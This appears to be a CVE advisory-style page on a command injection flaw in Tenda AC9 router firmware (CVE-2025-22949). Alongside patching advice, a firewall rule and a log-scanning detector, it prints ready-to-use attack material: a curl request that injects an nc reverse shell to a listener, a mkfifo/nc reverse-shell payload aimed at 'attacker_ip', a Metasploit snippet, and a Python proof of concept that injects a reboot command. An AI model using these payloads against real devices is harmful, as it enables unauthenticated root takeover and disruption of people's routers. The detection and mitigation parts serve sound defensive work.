The CVE-2025-22949 vulnerability in Tenda AC9 routers (firmware v15.03.05.19) allows remote attackers to execute arbitrary commands via the `/goform/SetSambaCfg` endpoint. This occurs due to improper input sanitization in the Samba configuration function, where user-supplied data is directly passed to a system shell. An attacker can craft a malicious HTTP POST request containing OS commands in the `sambaUser` or `sambaPassword` parameters, which are then executed with root privileges. The lack of authentication checks further enables unauthenticated exploitation, leading to full device compromise.
DailyCVE Form
Platform: Tenda AC9
Version: v15.03.05.19
Vulnerability: Command Injection
Severity: Critical
Date: 04/09/2025
What Undercode Says:
Exploitation:
1. Craft a malicious POST request:

```bash
curl -X POST -d "sambaUser=admin&sambaPassword=;nc -e /bin/sh 192.168.1.100 4444;" http://target/goform/SetSambaCfg
```
2. Exploit via Metasploit (if a module is available):

```
use exploit/linux/http/tenda_ac9_rce
set RHOSTS target
run
```
Mitigation:
1. Apply vendor firmware patch immediately.
2. Block external access to `/goform/SetSambaCfg` via firewall:

```bash
iptables -A INPUT -p tcp --dport 80 -m string --string "/goform/SetSambaCfg" --algo bm -j DROP
```

3. Disable Samba if unused:

```bash
nvram set samba_enable=0
nvram commit
```
Detection:
Check logs for suspicious POST requests:

```bash
grep -E 'POST /goform/SetSambaCfg' /var/log/httpd.log
```
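The grep above matches only the path and will also report legitimate Samba configuration changes. As an added example that is not from the original page, the following script parses access-log lines and raises an alert only when a POST to `/goform/SetSambaCfg` carries shell metacharacters in `sambaUser` or `sambaPassword`; the log line format and the sample lines are constructed assumptions, so adapt `LINE_RE` to what your proxy or IDS actually writes.

```python
"""Flag access-log lines that look like command-injection attempts against
/goform/SetSambaCfg (CVE-2025-22949). Added example, not from the page."""
import re
from urllib.parse import parse_qs

TARGET_PATH = "/goform/SetSambaCfg"
WATCHED_PARAMS = ("sambaUser", "sambaPassword")
# Shell metacharacters that have no business in a Samba user name or
# password submitted to this endpoint; one occurrence is enough to alert.
SHELL_META = re.compile(r"[;|&`$\n\r]")

# Assumed (constructed) log format: client "METHOD path" status body="..."
LINE_RE = re.compile(
    r'^(?P<client>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" '
    r'(?P<status>\d{3}) body="(?P<body>.*)"$'
)

def parse_line(line):
    """Return the log fields as a dict, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def injection_params(body):
    """Names of watched parameters whose decoded value contains shell metacharacters."""
    fields = parse_qs(body, keep_blank_values=True)  # also URL-decodes %3B -> ;
    return [p for p in WATCHED_PARAMS
            if any(SHELL_META.search(v) for v in fields.get(p, []))]

def scan(lines):
    """Yield (client, suspicious parameter names) for POSTs to the Samba endpoint."""
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != TARGET_PATH:
            continue
        hits = injection_params(rec["body"])
        if hits:
            yield rec["client"], hits

# Constructed sample lines: a benign change, an injection attempt hidden in
# sambaPassword (URL-encoded), and an unrelated endpoint that must stay quiet.
SAMPLE_LOG = [
    '192.168.1.50 "POST /goform/SetSambaCfg" 200 body="sambaUser=share&sambaPassword=Winter2025"',
    '203.0.113.7 "POST /goform/SetSambaCfg" 200 body="sambaUser=admin&sambaPassword=%3Breboot%3B"',
    '192.168.1.50 "POST /goform/SetWifiCfg" 200 body="ssid=home%3Bx"',
]

if __name__ == "__main__":
    for client, params in scan(SAMPLE_LOG):
        print(f"ALERT {client}: shell metacharacters in {', '.join(params)}")
```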
Reverse Shell Payloads:

```
;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker_ip 4444 >/tmp/f;
```
POC Code:

```python
import requests

target = "http://192.168.1.1"
payload = ";reboot;"
requests.post(target + "/goform/SetSambaCfg", data={"sambaUser": payload})
```
Permanent Fix:
- Upgrade firmware beyond v15.03.05.19.
- Implement input validation on all form endpoints.
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-22949